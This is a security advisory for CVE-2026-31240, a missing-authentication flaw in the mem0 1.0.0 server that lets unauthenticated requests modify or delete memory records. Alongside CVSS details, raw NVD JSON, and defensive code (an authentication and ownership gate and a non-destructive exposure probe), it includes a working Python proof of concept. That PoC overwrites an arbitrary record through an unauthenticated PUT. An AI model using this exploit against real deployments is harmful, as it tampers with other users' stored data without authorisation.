Security Vulnerability Report
CVE-2026-31240 CVSS 7.5 HIGH

Published: 2026-05-12 18:16:52
Last Modified: 2026-05-14 20:17:04

Description

The mem0 1.0.0 server lacks authentication and authorization controls on its memory management API endpoints (CWE-306, Missing Authentication for Critical Function). Critical operations such as updating a memory record (PUT /memories/{memory_id}) are exposed without any verification of the requester's identity or permissions. A remote, unauthenticated attacker can send requests that modify, overwrite, or delete arbitrary memory records, leading to unauthorized data manipulation and potential data loss.
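The missing control is a pre-handler gate that first authenticates the caller and then checks that the targeted memory_id belongs to that caller. The block below is an added example of such a gate, not code from the advisory or from the mem0 project; the API keys, users and memory ownership table are constructed for the example, and the assumption that the mem0 server is a FastAPI application (where this would be wired as a route dependency) is mine. The demo replays the advisory's unauthenticated PUT alongside authenticated and cross-tenant requests.

```python
import hmac
import re
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed sample data for this example (not mem0's real key or record store).
API_KEYS: Dict[str, str] = {
    "k-alice-9f3a": "alice",
    "k-bob-17c2": "bob",
}
MEMORY_OWNERS: Dict[str, str] = {
    "mem-001": "alice",
    "mem-002": "bob",
}

# Matches the vulnerable route shape: PUT /memories/{memory_id}
MEMORY_ROUTE = re.compile(r"^/memories/([A-Za-z0-9_-]+)$")


@dataclass
class Decision:
    status: int               # 200 means "let the route handler run"
    reason: str
    user: Optional[str] = None


def authenticate(headers: Dict[str, str]) -> Optional[str]:
    """Resolve `Authorization: Bearer <key>` to a user id.

    Every candidate key is compared with hmac.compare_digest so response
    timing does not leak how many leading bytes of a guess were correct.
    """
    auth = next((v for k, v in headers.items() if k.lower() == "authorization"), "")
    if not auth.lower().startswith("bearer "):
        return None
    presented = auth[len("bearer "):].strip().encode()
    for key, user in API_KEYS.items():
        if hmac.compare_digest(key.encode(), presented):
            return user
    return None


def gate_memory_request(method: str, path: str, headers: Dict[str, str]) -> Decision:
    """Authentication plus per-record authorization for /memories/{memory_id}.

    This is the check the vulnerable server skips: it runs before the handler
    and refuses any request that is unauthenticated or aimed at a record the
    caller does not own.
    """
    m = MEMORY_ROUTE.match(path)
    if m is None:
        return Decision(404, "not a memory route")
    user = authenticate(headers)
    if user is None:
        # Reject before touching the store or revealing whether the id exists.
        return Decision(401, "missing or invalid API key")
    memory_id = m.group(1)
    owner = MEMORY_OWNERS.get(memory_id)
    if owner != user:
        # Same 404 for "absent" and "someone else's" so ids cannot be enumerated.
        return Decision(404, "no such memory for this caller", user)
    return Decision(200, f"{method} allowed", user)


def demo():
    """Replay the advisory's unauthenticated PUT plus a few authenticated cases."""
    cases = [
        ("PUT", "/memories/mem-001", {"Content-Type": "application/json"}),       # the PoC request, no credentials
        ("PUT", "/memories/mem-001", {"Authorization": "Bearer k-alice-9f3a"}),   # owner updating own record
        ("DELETE", "/memories/mem-001", {"Authorization": "Bearer k-bob-17c2"}),  # cross-tenant delete attempt
        ("PUT", "/memories/mem-999", {"Authorization": "Bearer k-alice-9f3a"}),   # record that does not exist
        ("PUT", "/memories/mem-001", {"authorization": "Bearer nope"}),           # invalid key, lowercase header
    ]
    return [gate_memory_request(*c).status for c in cases]


if __name__ == "__main__":
    print(demo())  # [401, 200, 404, 404, 401]
```

Returning 404 rather than 403 for another tenant's record is a deliberate choice: a 403 would confirm that the guessed memory_id exists. The unauthenticated case is rejected before the ownership lookup for the same reason.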

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Vector breakdown: network attack vector, low attack complexity, no privileges and no user interaction required, scope unchanged; high integrity impact, no confidentiality or availability impact (exploitability subscore 3.9, impact subscore 3.6). The score reflects data tampering only: the vector records no confidentiality or availability effect even though the description mentions possible data loss through deletion.

Configurations (Affected Products)

No CPE configuration data is available for this entry; the description identifies the affected product as mem0 1.0.0.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_mem0(target_url, memory_id, new_data):
    """
    Exploit for CVE-2026-31240: Unauthenticated memory modification in mem0.
    """
    # Target endpoint to update memory
    endpoint = f"{target_url}/memories/{memory_id}"
    headers = {"Content-Type": "application/json"}
    # Payload containing the malicious data
    payload = {
        "text": new_data,
        "metadata": {"modified_by": "attacker"},
    }
    try:
        # Sending unauthenticated PUT request (no Authorization header at all);
        # a timeout keeps the script from hanging on an unresponsive host
        response = requests.put(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Successfully modified memory record {memory_id}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to modify record. Status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Example usage
    target = "http://localhost:8000"  # Replace with actual target
    mem_id = "victim_memory_id_here"
    malicious_content = "This data has been overwritten by an attacker."
    exploit_mem0(target, mem_id, malicious_content)
```
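The PoC above overwrites a real record. For checking whether a deployment is exposed without damaging data, the following is an added example, not part of the advisory or the mem0 project: it sends the same unauthenticated PUT but against a random memory_id that does not exist, so even a vulnerable server has nothing to overwrite. The verdict logic assumes a server that enforces authentication answers 401 or 403 before the route handler runs, while 200, 404 or 422 mean the request was processed without credentials. The `send` hook and the status codes used in the test are constructed so the logic can be exercised offline.

```python
import json
import secrets
import urllib.request
from urllib.error import HTTPError


def _default_send(url, body):
    """Send an unauthenticated PUT with urllib and return the HTTP status code."""
    req = urllib.request.Request(
        url,
        data=body,
        method="PUT",
        headers={"Content-Type": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except HTTPError as err:
        # 4xx/5xx are raised as exceptions; the status code is what we want.
        return err.code


def probe_memory_update_auth(target_url, send=_default_send):
    """
    Classify a server as enforcing (or not) authentication on PUT /memories/{memory_id}.

    A random memory_id is used so a vulnerable server has no record to modify.
    `send(url, body) -> status` is injectable for offline testing.
    """
    fake_id = "probe-" + secrets.token_hex(8)  # assumed not to exist on the target
    url = f"{target_url.rstrip('/')}/memories/{fake_id}"
    body = json.dumps({"text": "auth probe, no-op"}).encode()
    status = send(url, body)
    if status in (401, 403):
        verdict = "auth enforced"
    elif status == 200:
        verdict = "vulnerable: unauthenticated update accepted"
    elif status in (404, 422):
        # The handler (or its input validation) ran without any credentials.
        # 404 is only meaningful if /memories/{id} is really served here.
        verdict = "likely vulnerable: request processed without credentials"
    else:
        verdict = "inconclusive"
    return {"url": url, "status": status, "verdict": verdict}


if __name__ == "__main__":
    print(probe_memory_update_auth("http://localhost:8000"))
```

A 404 is ambiguous on its own: a reverse proxy or a different application on the same port also returns it, so confirm that the route exists (for example with an authenticated GET) before reporting the instance as vulnerable.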

References

https://github.com/mem0ai/mem0
https://www.notion.so/CVE-2026-31240-35d1e13931888170964ae035c04a8f18

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-31240",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T18:16:52.443",
    "lastModified": "2026-05-14T20:17:03.757",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The mem0 1.0.0 server lacks authentication and authorization controls for its memory management API endpoints. Critical functions such as updating memory records (PUT /memories/{memory_id}) are exposed without any verification of the requester's identity or permissions. A remote attacker can exploit this by sending unauthenticated requests to modify, overwrite, or delete arbitrary memory records, leading to unauthorized data manipulation and potential data loss."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mem0ai/mem0",
        "source": "[email protected]"
      },
      {
        "url": "https://www.notion.so/CVE-2026-31240-35d1e13931888170964ae035c04a8f18",
        "source": "[email protected]"
      }
    ]
  }
}
```